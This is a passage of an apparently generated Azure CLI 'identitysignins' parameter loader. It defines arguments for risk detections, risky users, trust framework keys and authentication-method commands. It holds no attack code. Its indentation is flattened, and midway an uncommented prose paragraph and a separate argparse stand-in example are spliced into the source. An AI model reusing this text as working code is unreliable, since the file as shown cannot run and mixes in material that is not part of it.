'malwareInfectedIPAddress, suspiciousIPAddress, leakedCredentials, '
'investigationsThreatIntelligence, generic, adminConfirmedUserCompromised, '
'mcasImpossibleTravel, mcasSuspiciousInboxManipulationRules, '
'investigationsThreatIntelligenceSigninLinked, maliciousIPAddressValidCredentialsBlockedIP, '
'and unknownFutureValue. If the risk detection is a premium detection, this property will '
'show generic.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('risk_type', arg_type=get_enum_type(['unlikelyTravel', 'anonymizedIPAddress', 'maliciousIPAddress',
'unfamiliarFeatures', 'malwareInfectedIPAddress',
'suspiciousIPAddress', 'leakedCredentials',
'investigationsThreatIntelligence', 'generic',
'adminConfirmedUserCompromised', 'mcasImpossibleTravel',
'mcasSuspiciousInboxManipulationRules',
'investigationsThreatIntelligenceSigninLinked',
'maliciousIPAddressValidCredentialsBlockedIP',
'unknownFutureValue']), help='')
c.argument('source', type=str, help='Source of the risk detection. For example, \'activeDirectory\'.')
c.argument('token_issuer_type', arg_type=get_enum_type(['AzureAD', 'ADFederationServices',
'UnknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='The display name of the user.')
c.argument('user_id', type=str, help='Unique ID of the user.')
c.argument('user_principal_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('city', type=str, help='Provides the city where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
c.argument('country_or_region', type=str, help='Provides the country code info (2 letter code) where the '
'sign-in originated. This is calculated using latitude/longitude information from the sign-in '
'activity.', arg_group='Location')
c.argument('geo_coordinates', action=AddGeoCoordinates, nargs='+', help='geoCoordinates',
arg_group='Location')
c.argument('state', type=str, help='Provides the State where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
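# Illustrative usage (enum values come from the get_enum_type lists above;
# everything else is a placeholder):
#   az identitysignins risk-detection-risk-detection create-risk-detection \
#       --activity signin --risk-level medium --risk-state atRisk \
#       --ip-address "203.0.113.10" --user-principal-name "jane.doe@contoso.com"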
with self.argument_context('identitysignins risk-detection-risk-detection delete-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risk-detection-risk-detection list-risk-detection') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risk-detection-risk-detection show-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risk-detection-risk-detection update-risk-detection') as c:
c.argument('risk_detection_id', type=str, help='key: id of riskDetection')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('activity', arg_type=get_enum_type(['signin', 'user', 'unknownFutureValue']), help='')
c.argument('activity_date_time', help='Date and time that the risky activity occurred.')
c.argument('additional_info', type=str, help='Additional information associated with the risk detection in '
'JSON format.')
c.argument('correlation_id', type=str, help='Correlation ID of the sign-in associated with the risk detection. '
'This property is null if the risk detection is not associated with a sign-in.')
c.argument('detected_date_time', help='Date and time that the risk was detected.')
c.argument('detection_timing_type', arg_type=get_enum_type(['notDefined', 'realtime', 'nearRealtime',
'offline', 'unknownFutureValue']), help='')
c.argument('ip_address', type=str, help='Provides the IP address of the client from where the risk occurred.')
c.argument('last_updated_date_time', help='Date and time that the risk detection was last updated.')
c.argument('request_id', type=str, help='Request ID of the sign-in associated with the risk detection. This '
'property is null if the risk detection is not associated with a sign-in.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_event_type', type=str, help='The type of risk event detected. The possible values are '
           'unlikelyTravel, anonymizedIPAddress, maliciousIPAddress, unfamiliarFeatures, '
           'malwareInfectedIPAddress, suspiciousIPAddress, leakedCredentials, '
           'investigationsThreatIntelligence, generic, adminConfirmedUserCompromised, '
           'mcasImpossibleTravel, mcasSuspiciousInboxManipulationRules, '
           'investigationsThreatIntelligenceSigninLinked, maliciousIPAddressValidCredentialsBlockedIP, and '
           'unknownFutureValue. If the risk detection is a premium detection, the value is shown as generic.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('risk_type', arg_type=get_enum_type(['unlikelyTravel', 'anonymizedIPAddress', 'maliciousIPAddress',
'unfamiliarFeatures', 'malwareInfectedIPAddress',
'suspiciousIPAddress', 'leakedCredentials',
'investigationsThreatIntelligence', 'generic',
'adminConfirmedUserCompromised', 'mcasImpossibleTravel',
'mcasSuspiciousInboxManipulationRules',
'investigationsThreatIntelligenceSigninLinked',
'maliciousIPAddressValidCredentialsBlockedIP',
'unknownFutureValue']), help='')
c.argument('source', type=str, help='Source of the risk detection. For example, \'activeDirectory\'.')
c.argument('token_issuer_type', arg_type=get_enum_type(['AzureAD', 'ADFederationServices',
'UnknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='The display name of the user.')
c.argument('user_id', type=str, help='Unique ID of the user.')
c.argument('user_principal_name', type=str, help='The user principal name (UPN) of the user.')
c.argument('city', type=str, help='Provides the city where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
c.argument('country_or_region', type=str, help='Provides the country code info (2 letter code) where the '
'sign-in originated. This is calculated using latitude/longitude information from the sign-in '
'activity.', arg_group='Location')
c.argument('geo_coordinates', action=AddGeoCoordinates, nargs='+', help='geoCoordinates',
arg_group='Location')
c.argument('state', type=str, help='Provides the State where the sign-in originated. This is calculated using '
'latitude/longitude information from the sign-in activity.', arg_group='Location')
with self.argument_context('identitysignins risky-user-risky-user create-risky-user') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates whether a user\'s risky state is '
           'being processed by the backend.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change. '
           'Expected value: json-string/@json-file.')
with self.argument_context('identitysignins risky-user-risky-user delete-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risky-user-risky-user list-risky-user') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user-risky-user show-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user-risky-user update-risky-user') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates whether a user\'s risky state is '
           'being processed by the backend.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change. '
           'Expected value: json-string/@json-file.')
with self.argument_context('identitysignins risky-user confirm-compromised') as c:
c.argument('user_ids', nargs='+', help='')
with self.argument_context('identitysignins risky-user create-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates whether a user\'s risky state is '
           'being processed by the backend.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change. '
           'Expected value: json-string/@json-file.')
c.argument('activity', action=AddActivity, nargs='+', help='riskUserActivity')
c.argument('initiated_by', type=str, help='The ID of the actor that performed the operation.')
c.argument('user_id', type=str, help='The id of the user.')
with self.argument_context('identitysignins risky-user delete-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins risky-user dismiss') as c:
c.argument('user_ids', nargs='+', help='')
with self.argument_context('identitysignins risky-user list-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user show-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins risky-user update-history') as c:
c.argument('risky_user_id', type=str, help='key: id of riskyUser')
c.argument('risky_user_history_item_id', type=str, help='key: id of riskyUserHistoryItem')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('is_deleted', arg_type=get_three_state_flag(), help='Indicates whether the user is deleted. '
'Possible values are: true, false')
c.argument('is_processing', arg_type=get_three_state_flag(), help='Indicates whether a user\'s risky state is '
           'being processed by the backend.')
c.argument('risk_detail', arg_type=get_enum_type(['none', 'adminGeneratedTemporaryPassword',
'userPerformedSecuredPasswordChange',
'userPerformedSecuredPasswordReset',
'adminConfirmedSigninSafe', 'aiConfirmedSigninSafe',
'userPassedMFADrivenByRiskBasedPolicy',
'adminDismissedAllRiskForUser',
'adminConfirmedSigninCompromised', 'hidden',
'adminConfirmedUserCompromised', 'unknownFutureValue']),
help='')
c.argument('risk_last_updated_date_time', help='The date and time that the risky user was last updated.')
c.argument('risk_level', arg_type=get_enum_type(['low', 'medium', 'high', 'hidden', 'none',
'unknownFutureValue']), help='')
c.argument('risk_state', arg_type=get_enum_type(['none', 'confirmedSafe', 'remediated', 'dismissed', 'atRisk',
'confirmedCompromised', 'unknownFutureValue']), help='')
c.argument('user_display_name', type=str, help='Risky user display name.')
c.argument('user_principal_name', type=str, help='Risky user principal name.')
c.argument('history', type=validate_file_or_dict, help='The activity related to user risk level change. '
           'Expected value: json-string/@json-file.')
c.argument('activity', action=AddActivity, nargs='+', help='riskUserActivity')
c.argument('initiated_by', type=str, help='The ID of the actor that performed the operation.')
c.argument('user_id', type=str, help='The id of the user.')
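The Add* actions referenced throughout this loader (AddActivity, AddGeoCoordinates, AddKeys, and so on) come from the extension's action module, which is not shown here; conventionally they fold space-separated key=value tokens supplied through nargs='+' into a dict. Below is a minimal stand-in illustrating that pattern with plain argparse; it is an assumption about the generated classes, not a copy of them.

import argparse

class AddKeyValue(argparse.Action):
    """Hypothetical stand-in for the generated Add* actions used above."""
    def __call__(self, parser, namespace, values, option_string=None):
        # nargs='+' delivers a list of 'key=value' tokens; fold them into a dict.
        result = {}
        for token in values:
            key, _, value = token.partition('=')
            result[key] = value
        setattr(namespace, self.dest, result)

parser = argparse.ArgumentParser()
parser.add_argument('--activity', action=AddKeyValue, nargs='+')
args = parser.parse_args(['--activity', 'detail=userPassedMFADrivenByRiskBasedPolicy', 'risk-level=low'])
# args.activity == {'detail': 'userPassedMFADrivenByRiskBasedPolicy', 'risk-level': 'low'}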
with self.argument_context('identitysignins trust-framework-trust-framework show-trust-framework') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework-trust-framework update-trust-framework') as c:
c.argument('key_sets', type=validate_file_or_dict, help='Expected value: json-string/@json-file.')
c.argument('policies', action=AddPolicies, nargs='+', help='')
with self.argument_context('identitysignins trust-framework create-key-set') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('keys', action=AddKeys, nargs='+', help='')
with self.argument_context('identitysignins trust-framework create-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins trust-framework delete-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins trust-framework delete-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins trust-framework list-key-set') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework list-policy') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework set-policy-content') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('data', help='New media content.')
with self.argument_context('identitysignins trust-framework show-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework show-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins trust-framework show-policy-content') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
with self.argument_context('identitysignins trust-framework update-key-set') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('keys', action=AddKeys, nargs='+', help='')
with self.argument_context('identitysignins trust-framework update-policy') as c:
c.argument('trust_framework_policy_id', type=str, help='key: id of trustFrameworkPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins trust-framework-key-set generate-key') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('use', type=str, help='')
c.argument('kty', type=str, help='')
c.argument('nbf', type=int, help='')
c.argument('exp', type=int, help='')
with self.argument_context('identitysignins trust-framework-key-set show-active-key') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
with self.argument_context('identitysignins trust-framework-key-set upload-certificate') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('key', type=str, help='')
with self.argument_context('identitysignins trust-framework-key-set upload-pkcs12') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('key', type=str, help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins trust-framework-key-set upload-secret') as c:
c.argument('trust_framework_key_set_id', type=str, help='key: id of trustFrameworkKeySet')
c.argument('use', type=str, help='')
c.argument('k', type=str, help='')
c.argument('nbf', type=int, help='')
c.argument('exp', type=int, help='')
with self.argument_context('identitysignins user delete-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user delete-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user show-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user show-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user update-authentication') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('email_methods', action=AddEmailMethods, nargs='+', help='')
c.argument('fido2_methods', action=AddFido2Methods, nargs='+', help='')
c.argument('methods', action=AddMethods, nargs='+', help='')
c.argument('microsoft_authenticator_methods', action=AddMicrosoftAuthenticatorMethods, nargs='+', help='')
c.argument('oath_methods', action=AddOathMethods, nargs='+', help='')
c.argument('operations', action=AddOperations, nargs='+', help='')
c.argument('passwordless_microsoft_authenticator_methods', action=AddPasswordlessMicrosoftAuthenticatorMethods,
nargs='+', help='')
c.argument('password_methods', action=AddPasswordMethods, nargs='+', help='')
c.argument('phone_methods', action=AddPhoneMethods, nargs='+', help='')
c.argument('security_question_methods', action=AddSecurityQuestionMethods, nargs='+', help='')
c.argument('temporary_access_pass_methods', action=AddTemporaryAccessPassMethods, nargs='+', help='')
with self.argument_context('identitysignins user update-information-protection') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('data_loss_prevention_policies', action=AddDataLossPreventionPolicies, nargs='+', help='')
c.argument('sensitivity_labels', type=validate_file_or_dict, help='Expected value: json-string/@json-file.')
c.argument('sensitivity_policy_settings', action=AddSensitivityPolicySettings, nargs='+',
help='sensitivityPolicySettings')
c.argument('threat_assessment_requests', type=validate_file_or_dict, help='Expected value: '
           'json-string/@json-file.')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Policy')
c.argument('labels', type=validate_file_or_dict, help='Expected value: json-string/@json-file.',
           arg_group='Policy')
with self.argument_context('identitysignins user-authentication create-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='')
c.argument('last_action_date_time', help='')
c.argument('resource_location', type=str, help='')
c.argument('status', arg_type=get_enum_type(['notstarted', 'running', 'succeeded', 'failed']), help='')
c.argument('status_detail', type=str, help='')
with self.argument_context('identitysignins user-authentication create-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('creation_date_time', help='')
c.argument('password', type=str, help='')
with self.argument_context('identitysignins user-authentication create-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('phone_number', type=str, help='')
c.argument('phone_type', arg_type=get_enum_type(['mobile', 'alternateMobile', 'office', 'unknownFutureValue']),
help='')
c.argument('sms_sign_in_state', arg_type=get_enum_type(['notSupported', 'notAllowedByPolicy', 'notEnabled',
'phoneNumberNotUnique', 'ready', 'notConfigured',
'unknownFutureValue']), help='')
with self.argument_context('identitysignins user-authentication create-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication create-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('identitysignins user-authentication delete-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('software_oath_authentication_method_id', type=str, help='key: id of softwareOathAuthenticationMetho'
'd')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('long_running_operation_id', type=str, help='key: id of longRunningOperation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('password_authentication_method_id', type=str, help='key: id of passwordAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('passwordless_microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'passwordlessMicrosoftAuthenticatorAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('phone_authentication_method_id', type=str, help='key: id of phoneAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('security_question_authentication_method_id', type=str, help='key: id of '
'securityQuestionAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication delete-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('temporary_access_pass_authentication_method_id', type=str, help='key: id of '
'temporaryAccessPassAuthenticationMethod')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins user-authentication list-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-operation') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-password-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-passwordless-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-phone-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-security-question-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication list-temporary-access-pass-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-email-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('email_authentication_method_id', type=str, help='key: id of emailAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-fido2-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('fido2_authentication_method_id', type=str, help='key: id of fido2AuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('authentication_method_id', type=str, help='key: id of authenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-microsoft-authenticator-method') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('microsoft_authenticator_authentication_method_id', type=str, help='key: id of '
'microsoftAuthenticatorAuthenticationMethod')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins user-authentication show-oath-method') as c:
c.argument('user_id', type=str, help='key: id of user')
